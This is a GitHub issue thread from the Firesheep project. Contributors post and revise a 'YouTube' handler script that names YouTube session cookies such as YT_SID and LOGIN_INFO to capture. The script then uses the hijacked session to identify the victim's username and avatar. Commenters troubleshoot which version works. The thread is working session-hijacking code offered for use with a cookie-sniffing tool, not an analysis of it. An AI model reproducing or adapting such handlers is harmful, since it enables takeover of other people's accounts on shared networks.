### ISSUE TITLE
Handler for Youtube.com

### ISSUE THREAD

**Issue by ghost** [codebutler/firesheep#25]
```
// Firesheep script for Youtube
// by Jaco (2010)

register({
  name: "YouTube",
  url: 'http://www.youtube.com/',
  domains: [ 'youtube.com' ],
  sessionCookieNames: [ 'YT_SID', 'LOGIN_INFO', 'PREF', 'VISITOR_INFO1_LIVE', 'GEO' ],

  identifyUser: function () {
    var resp = this.httpGet(this.siteUrl);
    this.userName = resp.body.querySelector('#masthead-utility .floatR .yt-uix-button-content').innerHTML;
    this.siteName = 'YouTube';

    var avatar_element;
    try {
      var profile = this.httpGet('http://www.youtube.com/user/' + this.userName);
      avatar_element = profile.body.querySelector('.user-thumb-semismall img');
    }
    catch(err) {
      avatar_element = null;
    }

    if (avatar_element) {
      this.userAvatar = avatar_element.src;
      if (this.userAvatar.substr(0, 4) != 'http') {
        this.userAvatar = 'http://www.youtube.com' + this.userAvatar;
      }
    }
}
});
```

**Comment by clinton4** [comment]
Cant get this to work, should it?

**Comment by binded-zz** [comment]
this works just fine i think you need to just remove the # at the end and you will be fine

theres no problems with it that i can see 

copy every thing but the last #  and goto prefs. and then add site and add the name then edit it and paste every thing above  and save and it will work 
just fine

**Comment by oskvadd** [comment]
register({
name: "YouTube",
url: 'http://www.youtube.com/',
domains: [ 'youtube.com' ],
sessionCookieNames: ['LOGIN_INFO', 'GEO' ],
identifyUser: function () {
var resp = this.httpGet(this.siteUrl);
this.userName = resp.body.querySelector('span.yt-uix-button-content').innerHTML;
this.siteName = 'YouTube';
var avatar_element;
try {
var profile = this.httpGet('http://www.youtube.com/user/' + this.userName);
avatar_element = profile.body.querySelector('.user-thumb-semismall img');
}
catch(err) {
avatar_element = null;
}
if (avatar_element) {
this.userAvatar = avatar_element.src;
if (this.userAvatar.substr(0, 4) != 'http') {
this.userAvatar = 'http://www.youtube.com' + this.userAvatar;
}
}
}
});

Try this if the above not working

**Comment by TerrorFactor** [comment]
The second one works(the first one gives "error" as username).
They both keep adding the same youtube-account tho' :/

**Comment by codebutler** [comment]
Please re-open if this handler still works.
